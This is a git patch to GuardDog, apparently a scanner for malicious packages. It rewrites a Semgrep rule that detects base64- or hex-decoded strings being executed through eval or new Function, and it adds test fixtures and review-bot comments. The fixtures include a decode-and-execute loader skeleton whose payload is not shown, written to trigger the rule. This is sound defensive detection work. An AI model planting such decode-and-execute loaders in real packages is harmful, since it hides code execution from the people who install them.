From af891f9f675466f9e78cf59d2559f31505a752d5 Mon Sep 17 00:00:00 2001
From: Sebastian Obregoso
Date: Tue, 10 Sep 2024 16:21:50 +0200
Subject: [PATCH] adding a new detection and test case
---
 .../analyzer/sourcecode/npm-exec-base64.yml | 18 +++++++++++++-----
 tests/analyzer/sourcecode/npm-exec-base64.js | 15 +++++++++++++--
 2 files changed, 26 insertions(+), 7 deletions(-)
diff --git a/guarddog/analyzer/sourcecode/npm-exec-base64.yml b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
index 60d06dd8..671f9a15 100644
--- a/guarddog/analyzer/sourcecode/npm-exec-base64.yml
+++ b/guarddog/analyzer/sourcecode/npm-exec-base64.yml
@@ -9,8 +9,16 @@ rules:
 languages:
 - javascript
 severity: WARNING
- patterns:
- - pattern-not: eval('...')
- - pattern-not: eval("...")
- - pattern-not: eval(`...`)
- - pattern: eval(atob(...))
+ mode: taint
+ pattern-sources:
+ - pattern-either:
+ - pattern: Buffer.from(...)
+ - pattern: '"..."'
+ pattern-sinks:
+ - pattern-either:
+ - patterns:
+ - pattern-inside: |
+ $FN = new Function(...)
+ ...
+ - pattern: $FN(...)
+ - pattern: eval(...)
diff --git a/tests/analyzer/sourcecode/npm-exec-base64.js b/tests/analyzer/sourcecode/npm-exec-base64.js
index 247e27de..817588e7 100644
--- a/tests/analyzer/sourcecode/npm-exec-base64.js
+++ b/tests/analyzer/sourcecode/npm-exec-base64.js
@@ -1,2 +1,13 @@
-// ruleid: npm-exec-base64
-eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"))
+function f(){
+ // ruleid: npm-exec-base64
+ eval(atob("Y29uc29sZS5sb2coIk5ldmVyIGdvbm5hIGdpdmUgeW91IHVwIikK"));
+}
+
+function f() {
+ import fetch from "node-fetch"
+ const admin = "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"
+ const adminResult = Buffer.from(admin, 'hex').toString('utf8');
+ const func = new Function(adminResult);
+ // ruleid: npm-exec-base64
+ func(adminResult);
+}
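Review bot: The `new Function` sink is the later call `$FN(...)`, so taint has to reach that call's arguments rather than the constructor; code that builds `new Function(decoded)` and then invokes the result with no arguments would, as far as the visible patterns show, produce no finding. Making the constructor itself the sink, e.g. `- pattern: new Function(...)`, ties the finding to the decoded string becoming code. The fixture added in tests/analyzer/sourcecode/npm-exec-base64.js appears to match only because it calls `func(adminResult)` with the payload as an argument, so it does not exercise this gap. Separately, `atob(...)` is no longer named anywhere and the three `pattern-not: eval('...')` exclusions are gone while `'"..."'` is now a source, so it is worth confirming that `eval(atob(x))` on a non-literal `x` still matches and that plain literal `eval` calls are meant to be reported under this rule id.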
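Review bot: The `import fetch from "node-fetch"` line sits inside the body of the second `f`, where a static import declaration is not valid JavaScript, so the fixture depends on how the analyzer's parser recovers from the error; `fetch` is not used in the lines shown and the line can simply be dropped. Both functions are also named `f`; renaming the second one keeps the two cases distinct. The file has only `// ruleid:` cases, so an `// ok: npm-exec-base64` case would document what the rewritten rule must not report.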